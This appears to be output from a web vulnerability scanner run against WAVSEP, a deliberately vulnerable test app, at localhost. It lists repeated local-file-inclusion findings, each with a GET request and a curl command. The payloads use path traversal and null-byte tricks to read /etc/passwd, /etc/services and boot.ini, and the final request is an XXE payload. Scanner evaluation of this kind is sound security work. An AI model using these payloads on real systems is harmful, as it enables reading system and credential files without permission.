Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
